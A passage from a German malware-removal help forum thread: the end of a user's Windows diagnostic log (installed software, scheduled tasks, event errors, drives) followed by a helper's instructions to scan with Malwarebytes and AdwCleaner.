Microsoft Office Excel MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Groove MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office InfoPath MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Office 32-bit Components 2010 (Version: 14.0.6029.1000)
Microsoft Office OneNote MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Outlook MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office PowerPoint MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Professional Plus 2010 (Version: 14.0.6029.1000)
Microsoft Office Proof (English) 2010 (Version: 14.0.6029.1000)
Microsoft Office Proof (French) 2010 (Version: 14.0.6029.1000)
Microsoft Office Proof (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Proof (Italian) 2010 (Version: 14.0.6029.1000)
Microsoft Office Proofing (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Publisher MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Shared 32-bit MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Shared MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Office Word MUI (German) 2010 (Version: 14.0.6029.1000)
Microsoft Silverlight (Version: 5.1.20513.0)
Microsoft SQL Server 2005 Compact Edition [ENU] (x32 Version: 3.1.0000)
Microsoft SQL Server 2008 (64-bit)
Microsoft SQL Server 2008 Browser (x32 Version: 10.1.2531.0)
Microsoft SQL Server 2008 Common Files (Version: 10.0.1600.22)
Microsoft SQL Server 2008 Common Files (Version: 10.1.2531.0)
Microsoft SQL Server 2008 Database Engine Services (Version: 10.1.2531.0)
Microsoft SQL Server 2008 Database Engine Shared (Version: 10.1.2531.0)
Microsoft SQL Server 2008 Native Client (Version: 10.1.2531.0)
Microsoft SQL Server 2008 RsFx Driver (Version: 10.1.2531.0)
Microsoft SQL Server Compact 3.5 SP2 DEU (x32 Version: 3.5.8080.0)
Microsoft SQL Server Compact 3.5 SP2 x64 DEU (Version: 3.5.8080.0)
Microsoft SQL Server VSS Writer (Version: 10.1.2531.0)
Microsoft Visual C++ 2005 Redistributable (x32 Version: 8.0.56336)
Microsoft Visual C++ 2005 Redistributable (x32 Version: 8.0.61001)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (Version: 9.0.30729)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (Version: 9.0.30729.6161)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (x32 Version: 9.0.30729)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (x32 Version: 9.0.30729.6161)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (Version: 10.0.40219)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (x32 Version: 10.0.40219)
Microsoft Visual C++ 2010 Express - DEU (x32 Version: 10.0.30319)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106 (x32 Version: 11.0.51106.1)
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.51106 (x32 Version: 11.0.51106)
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.51106 (x32 Version: 11.0.51106)
Microsoft Visual Studio 2010 Express Prerequisites x64 - DEU (Version: 10.0.30319)
Microsoft XNA Framework Redistributable 3.1 (x32 Version: 3.1.10527.0)
Microsoft-Maus- und Tastatur-Center (Version: 2.1.177.0)
MixPad Audiodatei-Mixer (x32)
Mozilla Firefox 12.0 (x86 de) (x32 Version: 12.0)
Mozilla Maintenance Service (x32 Version: 12.0)
MSVCRT (x32 Version: 15.4.2862.0708)
MSVCRT_amd64 (x32 Version: 15.4.2862.0708)
MSXML 4.0 SP3 Parser (KB2721691) (x32 Version: 4.30.2114.0)
MSXML 4.0 SP3 Parser (KB2758694) (x32 Version: 4.30.2117.0)
MSXML 4.0 SP3 Parser (x32 Version: 4.30.2100.0)
myMugle (x32 Version: 3.0.0.0)
NCH Tone Generator (x32)
nder (Version: 2.63-release)
Need For Speed™ World (x32 Version: 1.0.0.1398)
NetBeans IDE 7.3 (Version: 7.3)
Norton Identity Safe (x32 Version: 2013.4.0.10)
Notepad++ (x32 Version: 6.1.2)
NVIDIA 3D Vision Driver 285.64 (Version: 285.64)
NVIDIA Control Panel 285.64 (Version: 285.64)
NVIDIA Graphics Driver 285.64 (Version: 285.64)
NVIDIA Install Application (Version: 2.1002.46.235)
NVIDIA Optimus 1.5.20 (Version: 1.5.20)
NVIDIA PhysX (x32 Version: 9.10.0513)
NVIDIA Stereoscopic 3D Driver (x32 Version: 7.17.12.8564)
NVIDIA Update Components (Version: 1.5.20)
OpenAL (x32)
Oracle VM VirtualBox 4.2.16 (Version: 4.2.16)
Paint.NET v3.5.10 (Version: 3.60.0)
PCSUITE SHREDDER (x32)
PCSX2 - Playstation 2 Emulator (x32)
phase-6 2.3.2b (x32 Version: 2.3.2b)
PhotoStage Slideshow Producer (x32)
Picasa 3 (x32 Version: 3.9)
PlayReady PC Runtime amd64 (Version: 1.3.0)
Pošta Windows Live (x32 Version: 15.4.3502.0922)
Project 64 version 2.1.0.1 (x32 Version: 2.1.0.1)
Raccolta foto di Windows Live (x32 Version: 15.4.3502.0922)
Realtek High Definition Audio Driver (x32 Version: 6.0.1.6449)
Realtek USB 2.0 Reader Driver (x32 Version: 6.1.7600.10010)
Remote Control Input Device Registry Key (x32 Version: 1.1.0.0.081231)
Resource Hacker Version 3.6.0 (x32)
Revo Uninstaller 1.95 (x32 Version: 1.95)
Scratch (x32 Version: 1.4.0.0)
Secret Maryo Chronicles (x32 Version: 1.9)
Service Pack 1 für SQL Server 2008 (KB 968369) (64-bit) (Version: 10.1.2531.0)
sfArk (x32)
Skype™ 6.6 (x32 Version: 6.6.106)
Speccy (Version: 1.21)
Spelling Dictionaries Support For Adobe Reader X (x32 Version: 10.0.0)
Spybot - Search & Destroy (x32 Version: 2.1.19)
Sql Server Customer Experience Improvement Program (Version: 10.1.2531.0)
Stella 3.6 (x32)
Synaptics Pointing Device Driver (Version: 16.3.15.1)
System Explorer 4.2.2 (x32)
TeamSpeak 3 Client (Version: 3.0.10.1)
TeamViewer 8 (x32 Version: 8.0.18930)
Techne (HKCU Version: 1.3.0.15)
Text-To-Speech-Runtime (x32 Version: 1.0.0.0)
TI USB 3.0 Host Controller Driver (x32 Version: 1.12.16)
TI USB3 Host Driver (x32 Version: 1.12.16)
TuneUp Utilities 2013 (x32 Version: 13.0.3020.2)
TuneUp Utilities Language Pack (de-DE) (x32 Version: 13.0.3020.2)
Ubisoft Game Launcher (x32 Version: 1.0.0.0)
Unlocker 1.9.2 (Version: 1.9.2)
Unterstützungsdateien für Microsoft SQL Server 2008-Setup  (Version: 10.1.2731.0)
Update for Microsoft .NET Framework 4.5 (KB2750147) (x32 Version: 1)
Update for Microsoft .NET Framework 4.5 (KB2805221) (x32 Version: 1)
Update for Microsoft .NET Framework 4.5 (KB2805226) (x32 Version: 1)
Update for Microsoft Office 2010 (KB2553065)
Update for Microsoft Office 2010 (KB2553092)
Update for Microsoft Office 2010 (KB2553181) 64-Bit Edition
Update for Microsoft Office 2010 (KB2553267) 64-Bit Edition
Update for Microsoft Office 2010 (KB2553270) 64-Bit Edition
Update for Microsoft Office 2010 (KB2553310) 64-Bit Edition
Update for Microsoft Office 2010 (KB2553378) 64-Bit Edition
Update for Microsoft Office 2010 (KB2566458)
Update for Microsoft Office 2010 (KB2598242) 64-Bit Edition
Update for Microsoft Office 2010 (KB2687509) 64-Bit Edition
Update for Microsoft Office 2010 (KB2760631) 64-Bit Edition
Update for Microsoft Office 2010 (KB2767886) 64-Bit Edition
Update for Microsoft OneNote 2010 (KB2553290) 64-Bit Edition
Update for Microsoft Outlook 2010 (KB2597090) 64-Bit Edition
Update for Microsoft Outlook 2010 (KB2687623) 64-Bit Edition
Update for Microsoft Outlook Social Connector 2010 (KB2553406) 64-Bit Edition
Update for Microsoft PowerPoint 2010 (KB2598240) 64-Bit Edition
Update for Microsoft SharePoint Workspace 2010 (KB2589371) 64-Bit Edition
Usenet.nl (HKCU)
VideoPad Videobearbeitungs-Software (x32)
VirtualDJ Home FREE (x32 Version: 7.4)
Vita 2 (Version: 1.0.0.0)
Vita 2 Zusatzcontent (Version: 1.0.0.0)
Vita Bass Machine (Version: 1.0.0.0)
Vita Rock Drums (Version: 1.0.0.0)
Vita String Ensemble (Version: 1.0.0.0)
Vita World Percussion (Version: 1.0.0.0)
VLC media player 1.1.11 (x32 Version: 1.1.11)
watchmi (x32 Version: 3.0.0)
WBFS Manager 2.5 (Version: 2.5)
Web Assistant 2.0.0.601 (Version: 2.0.0.601)
Windows Live (x32 Version: 15.4.3502.0922)
Windows Live Communications Platform (x32 Version: 15.4.3502.0922)
Windows Live Essentials (x32 Version: 15.4.3502.0922)
Windows Live Essentials (x32 Version: 15.4.3538.0513)
Windows Live Fotogalerie (x32 Version: 15.4.3502.0922)
Windows Live Fotótár (x32 Version: 15.4.3502.0922)
Windows Live ID Sign-in Assistant (Version: 7.250.4232.0)
Windows Live Installer (x32 Version: 15.4.3502.0922)
Windows Live Language Selector (Version: 15.4.3538.0513)
Windows Live Mail (x32 Version: 15.4.3502.0922)
Windows Live Mesh (x32 Version: 15.4.3502.0922)
Windows Live Mesh ActiveX control for remote connections (x32 Version: 15.4.5722.2)
Windows Live Mesh ActiveX Control for Remote Connections (x32 Version: 15.4.5722.2)
Windows Live Mesh ActiveX-objekt til fjernforbindelser (x32 Version: 15.4.5722.2)
Windows Live Mesh ActiveX-vezérlő távoli kapcsolatokhoz (x32 Version: 15.4.5722.2)
Windows Live MIME IFilter (Version: 15.4.3502.0922)
Windows Live Movie Maker (x32 Version: 15.4.3502.0922)
Windows Live Photo Common (x32 Version: 15.4.3502.0922)
Windows Live Photo Gallery (x32 Version: 15.4.3502.0922)
Windows Live PIMT Platform (x32 Version: 15.4.3508.1109)
Windows Live Remote Client (Version: 15.4.5722.2)
Windows Live Remote Client Resources (Version: 15.4.5722.2)
Windows Live Remote Service (Version: 15.4.5722.2)
Windows Live Remote Service Resources (Version: 15.4.5722.2)
Windows Live SOXE (x32 Version: 15.4.3502.0922)
Windows Live SOXE Definitions (x32 Version: 15.4.3502.0922)
Windows Live UX Platform (x32 Version: 15.4.3502.0922)
Windows Live UX Platform Language Pack (x32 Version: 15.4.3508.1109)
Windows Live Writer (x32 Version: 15.4.3502.0922)
Windows Live Writer Resources (x32 Version: 15.4.3502.0922)
Windows Media Center Add-in for Silverlight (x32 Version: 4.7.3.0)
Windows Movie Maker 2.6 (x32 Version: 2.6.4037.0)
Windows Speech Recognition Macros (x32 Version: 1.0.6862.19)
Wireshark 1.8.7 (64-bit) (x32 Version: 1.8.7)
WxDFast Updater (x32)
YTD Video Downloader 4.3 (x32 Version: 4.3)

==================== Restore Points  =========================

31-07-2013 11:17:53 Removed Java 7 Update 21 (64-bit)
31-07-2013 11:20:02 Removed Java(TM) 6 Update 29 (64-bit)
31-07-2013 11:21:58 Removed Java 7 Update 21 (64-bit)
31-07-2013 11:22:57 Removed Java 7 Update 25
31-07-2013 11:30:39 Installed Java 7 Update 25 (64-bit)
31-07-2013 11:41:42 Installed Java 7 Update 25
05-08-2013 14:29:59 Revo Uninstaller's restore point - BlueStacks Notification Center
05-08-2013 14:30:41 Removed BlueStacks Notification Center
05-08-2013 15:55:49 Installed Oracle VM VirtualBox 4.2.16
13-08-2013 08:23:03 Windows Update
15-08-2013 12:11:05 Windows Update
18-08-2013 12:00:21 Windows Update
18-08-2013 16:27:04 Windows Update

==================== Hosts content: ==========================

2013-06-04 14:19 - 2013-07-23 12:42 - 00000860 ____N C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

Task: {0B14BE5B-8051-4D1B-849C-C9063E5C6B23} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2013-01-29] (Microsoft)
Task: {1C6504AA-6334-4D19-BD06-1DC1CAFCE201} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-01-29] (Microsoft Corporation)
Task: {1E2BECAF-002B-432E-B364-5ADDE31A4763} - System32\Tasks\NCH Software\photostageDowngrade => C:\Program Files (x86)\NCH Software\PhotoStage\photostage.exe [2012-07-26] (NCH Software)
Task: {2C003594-6A1A-4238-94BE-A3691163FB59} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search &amp; Destroy 2\SDUpdate.exe No File
Task: {2D27EB0B-CE5E-41CA-AB2E-36B499F9691E} - System32\Tasks\Java Update Scheduler => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2013-03-12] (Oracle Corporation)
Task: {4A644EE9-679C-446A-A8C5-F1F8D167EC77} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2012-01-19] (Google Inc.)
Task: {4D5E8568-8265-46A8-B87D-8D103D693EAD} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-01-29] (Microsoft Corporation)
Task: {503DF0C1-7351-4DA0-AB0D-C1A6EAA65C2A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2012-01-19] (Google Inc.)
Task: {59332908-BD03-4DCB-9CDC-D204727BC4EE} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search &amp; Destroy 2\SDImmunize.exe No File
Task: {5F94CC2C-0FDE-4A14-A60A-5E75CC402C5D} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-02-25] (Piriform Ltd)
Task: {68E582A6-F721-49C7-A0DD-67EC04ED3890} - System32\Tasks\Norton AntiVirus\Norton Error Analyzer => C:\Program Files (x86)\Norton AntiVirus\Engine\20.4.0.40\SymErr.exe No File
Task: {74406E8B-47E0-4BEE-B466-635E1F7A8C89} - System32\Tasks\Norton Identity Safe\Norton Error Analyzer => C:\Program Files (x86)\Norton Identity Safe\Engine\2013.4.0.10\SymErr.exe [2013-05-30] (Symantec Corporation)
Task: {8227FF19-8280-414E-AFB5-1CDA9FE64907} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-01-29] (Microsoft Corporation)
Task: {87399361-6364-45B0-9EC4-B016B4EB0055} - System32\Tasks\Microsoft\Windows\WindowsBackup\Windows Backup Monitor => C:\Windows\system32\sdclt.exe [2010-11-21] (Microsoft Corporation)
Task: {8AE7D937-D7FD-4D5A-832D-FFCE81BC888A} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-01-29] (Microsoft Corporation)
Task: {9A59CF05-CBA3-4B70-8A0E-5C97926A2E53} - System32\Tasks\NCH Software\ExpressZipDowngrade => C:\Program Files (x86)\NCH Software\ExpressZip\expresszip.exe [2012-12-14] (NCH Software)
Task: {A1E9C48F-3176-4584-B9F5-82A870ADBABF} - System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013 => C:\Program Files (x86)\TuneUp Utilities 2013\OneClick.exe [2013-01-28] (TuneUp Software)
Task: {A501BB97-83C8-429A-8CEE-CEA2E7BE5F80} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe [2010-11-21] (Microsoft Corporation)
Task: {AB1592DB-30D3-496D-9476-740C810AD6CC} - System32\Tasks\Norton Identity Safe\Norton Error Processor => C:\Program Files (x86)\Norton Identity Safe\Engine\2013.4.0.10\SymErr.exe [2013-05-30] (Symantec Corporation)
Task: {C7492ED3-4F59-4726-9FA5-0FB45AFD22F0} - System32\Tasks\Norton AntiVirus\Norton Error Processor => C:\Program Files (x86)\Norton AntiVirus\Engine\20.4.0.40\SymErr.exe No File
Task: {CF8C8953-87C9-4CD0-B5BB-CE2E6662AB37} - System32\Tasks\Adobe-Online-Aktualisierungsprogramm => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2013-04-04] (Adobe Systems Incorporated)
Task: {CFA7A3EC-CAF1-4E66-B63B-01229B7C0A97} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search &amp; Destroy 2\SDScan.exe No File
Task: {D22931C0-23D3-4CA3-AEC5-FD70EC8D67F1} - System32\Tasks\Microsoft\Windows\WindowsBackup\AutomaticBackup => C:\Windows\system32\rundll32.exe [2009-07-14] (Microsoft Corporation)
Task: {E3543653-6F6B-4D28-81CF-841348EA9ED1} - System32\Tasks\WxDFastUpdaterTask{3C1BA1D8-EAAE-42BB-9BC9-85A27908B34F} => C:\ProgramData\WxDFast\WxDFast.exe No File
Task: {E689D74D-1932-4A12-AF3D-F7C596AD23D9} - System32\Tasks\YourFile Update => C:\Program Files (x86)\YourFileDownloader\YourFileUpdater.exe No File
Task: {E6BCF55C-3F61-4672-AFEB-903258FC147F} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan => c:\program files\windows defender\MpCmdRun.exe [2009-07-14] (Microsoft Corporation)
Task: {F23ACF37-FCA8-4D7A-BBCF-18554EE1C12F} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task
Task: {F7B42FDA-90A1-40F8-8012-6D4811E54D6C} - System32\Tasks\GBoxUpdaterTask{131876AC-419C-40EF-98DD-8C8C18A85D0B} => C:\ProgramData\GBox\GBox.exe No File
Task: {FA3D3901-5AFE-4409-9757-A7B8F8127B68} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton AntiVirus\Engine\20.4.0.40\WSCStub.exe No File
Task: {FA988ADE-7378-4BDB-A1C8-0111DB6DACFC} - System32\Tasks\{E2C4A3D5-A61A-4501-BFE4-1E11C2145C4D} => c:\program files (x86)\google\chrome\application\chrome.exe [2013-07-25] (Google Inc.)
Task: C:\Windows\Tasks\GBoxUpdaterTask{131876AC-419C-40EF-98DD-8C8C18A85D0B}.job => C:\ProgramData\GBox\GBox.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\WxDFastUpdaterTask{3C1BA1D8-EAAE-42BB-9BC9-85A27908B34F}.job => C:\ProgramData\WxDFast\WxDFast.exe

==================== Faulty Device Manager Devices =============

Name: VirtualBox Host-Only Ethernet Adapter
Description: VirtualBox Host-Only Ethernet Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Oracle Corporation
Service: VBoxNetAdp
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Microsoft-Adapter für Miniports virtueller WiFis
Description: Microsoft-Adapter für Miniports virtueller WiFis
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: vwifimp
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (08/22/2013 11:19:23 AM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/22/2013 11:19:12 AM) (Source: BstHdAndroidSvc) (User: )
Description: Der Dienst kann nicht gestartet werden. System.ApplicationException: Cannot start service.  Service did not stop gracefully the last time it was run.
   bei BlueStacks.hyperDroid.Service.Service.OnStart(String[] args)
   bei System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state)

Error: (08/21/2013 02:46:34 PM) (Source: Application Error) (User: )
Description: Name der fehlerhaften Anwendung: MpCmdRun.exe, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bc8f9
Name des fehlerhaften Moduls: ntdll.dll, Version: 6.1.7601.18205, Zeitstempel: 0x51dba4e7
Ausnahmecode: 0xc0000005
Fehleroffset: 0x00000000000986ea
ID des fehlerhaften Prozesses: 0x17bc
Startzeit der fehlerhaften Anwendung: 0xMpCmdRun.exe0
Pfad der fehlerhaften Anwendung: MpCmdRun.exe1
Pfad des fehlerhaften Moduls: MpCmdRun.exe2
Berichtskennung: MpCmdRun.exe3

Error: (08/21/2013 01:31:06 PM) (Source: .NET Runtime Optimization Service) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_64) - Failed to execute command from the offline queue: uninstall "System.Configuration, Version=2.0.0.0, Culture=Neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=msil" /NoDependencies .  The error returned was Error: The specified assembly is not installed.
.

Error: (08/21/2013 01:31:06 PM) (Source: .NET Runtime Optimization Service) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_64) - Failed to execute command from the offline queue: uninstall "System.Data.SqlXml, Version=2.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil".  The error returned was Error: The specified assembly is not installed.
.

Error: (08/21/2013 01:29:51 PM) (Source: BstHdAndroidSvc) (User: )
Description: Der Dienst kann nicht gestartet werden. System.ApplicationException: Cannot start service.  Service did not stop gracefully the last time it was run.
   bei BlueStacks.hyperDroid.Service.Service.OnStart(String[] args)
   bei System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state)

Error: (08/21/2013 01:29:49 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/18/2013 01:49:09 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/18/2013 01:48:49 PM) (Source: BstHdAndroidSvc) (User: )
Description: Der Dienst kann nicht gestartet werden. System.ApplicationException: Cannot start service.  Service did not stop gracefully the last time it was run.
   bei BlueStacks.hyperDroid.Service.Service.OnStart(String[] args)
   bei System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state)

Error: (08/18/2013 01:48:11 PM) (Source: Avira Antivirus) (User: NT-AUTORITÄT)
Description: Während der Initialisierung der Suchengine trat ein unbekannter Fehler auf!
Fehlercode: 0x35


System errors:
=============
Error: (08/22/2013 11:19:12 AM) (Source: Service Control Manager) (User: )
Description: Der Dienst "BlueStacks Android Service" wurde mit folgendem Fehler beendet: 
%%1064

Error: (08/21/2013 01:30:51 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "Spybot-S&D 2 Scanner Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1053

Error: (08/21/2013 01:30:51 PM) (Source: Service Control Manager) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst Spybot-S&D 2 Scanner Service erreicht.

Error: (08/21/2013 01:30:20 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "Spybot-S&D 2 Updating Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1053

Error: (08/21/2013 01:30:20 PM) (Source: Service Control Manager) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst Spybot-S&D 2 Updating Service erreicht.

Error: (08/21/2013 01:29:51 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "BlueStacks Android Service" wurde mit folgendem Fehler beendet: 
%%1064

Error: (08/21/2013 01:29:48 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "Spybot-S&D 2 Scanner Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1053

Error: (08/21/2013 01:29:48 PM) (Source: Service Control Manager) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst Spybot-S&D 2 Scanner Service erreicht.

Error: (08/18/2013 06:27:18 PM) (Source: DCOM) (User: )
Description: {995C996E-D918-4A8C-A302-45719A6F4EA7}

Error: (08/18/2013 01:48:49 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "BlueStacks Android Service" wurde mit folgendem Fehler beendet: 
%%1064


Microsoft Office Sessions:
=========================
Error: (08/22/2013 11:19:23 AM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/22/2013 11:19:12 AM) (Source: BstHdAndroidSvc)(User: )
Description: Der Dienst kann nicht gestartet werden. System.ApplicationException: Cannot start service.  Service did not stop gracefully the last time it was run.
   bei BlueStacks.hyperDroid.Service.Service.OnStart(String[] args)
   bei System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state)

Error: (08/21/2013 02:46:34 PM) (Source: Application Error)(User: )
Description: MpCmdRun.exe6.1.7600.163854a5bc8f9ntdll.dll6.1.7601.1820551dba4e7c000000500000000000986ea17bc01ce9e6c76ee2d04c:\program files\windows defender\MpCmdRun.exeC:\Windows\SYSTEM32\ntdll.dllb585ee4e-0a5f-11e3-a4a1-ac7289be7f07

Error: (08/21/2013 01:31:06 PM) (Source: .NET Runtime Optimization Service)(User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_64) - Failed to execute command from the offline queue: uninstall "System.Configuration, Version=2.0.0.0, Culture=Neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=msil" /NoDependencies .  The error returned was Error: The specified assembly is not installed.
.

Error: (08/21/2013 01:31:06 PM) (Source: .NET Runtime Optimization Service)(User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_64) - Failed to execute command from the offline queue: uninstall "System.Data.SqlXml, Version=2.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil".  The error returned was Error: The specified assembly is not installed.
.

Error: (08/21/2013 01:29:51 PM) (Source: BstHdAndroidSvc)(User: )
Description: Der Dienst kann nicht gestartet werden. System.ApplicationException: Cannot start service.  Service did not stop gracefully the last time it was run.
   bei BlueStacks.hyperDroid.Service.Service.OnStart(String[] args)
   bei System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state)

Error: (08/21/2013 01:29:49 PM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/18/2013 01:49:09 PM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/18/2013 01:48:49 PM) (Source: BstHdAndroidSvc)(User: )
Description: Der Dienst kann nicht gestartet werden. System.ApplicationException: Cannot start service.  Service did not stop gracefully the last time it was run.
   bei BlueStacks.hyperDroid.Service.Service.OnStart(String[] args)
   bei System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state)

Error: (08/18/2013 01:48:11 PM) (Source: Avira Antivirus)(User: NT-AUTORITÄT)
Description: 0x35


==================== Memory info =========================== 

Percentage of memory in use: 60%
Total physical RAM: 4001.87 MB
Available physical RAM: 1579.84 MB
Total Pagefile: 8001.93 MB
Available Pagefile: 4374.12 MB
Total Virtual: 8192 MB
Available Virtual: 8191.82 MB

==================== Drives ================================

Drive c: (Boot) (Fixed) (Total:394.66 GB) (Free:106.02 GB) NTFS
Drive d: (Recover) (Fixed) (Total:70 GB) (Free:40.48 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 466 GB) (Disk ID: 0DA1342C)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=395 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=70 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=1 GB) - (Type=12)

==================== End Of Log ============================
         
--- --- ---


Hoffe, das Durcheinander mit meinen ganzen Programmen macht das Ganze nicht zu schwer.

Alt 22.08.2013, 12:11   #4
schrauber
/// the machine
/// TB-Ausbilder
 




Downloade Dir bitte Malwarebytes Anti-Malware
  • Installiere das Programm in den vorgegebenen Pfad. (Bebilderte Anleitung zu MBAM)
  • Starte Malwarebytes' Anti-Malware (MBAM).
  • Klicke im Anschluss auf Scannen, wähle den Bedrohungssuchlauf aus und klicke auf Suchlauf starten.
  • Lass am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Auswahl entfernen.
  • Lass deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
  • Starte MBAM, klicke auf Verlauf und dann auf Anwendungsprotokolle.
  • Wähle das neueste Scan-Protokoll aus und klicke auf Export. Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab. Das Logfile von MBAM findest du hier.
  • Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.


Downloade Dir bitte AdwCleaner auf deinen Desktop.
  • Schließe alle offenen Programme und Browser. Bebilderte Anleitung zu AdwCleaner.
  • Starte die AdwCleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
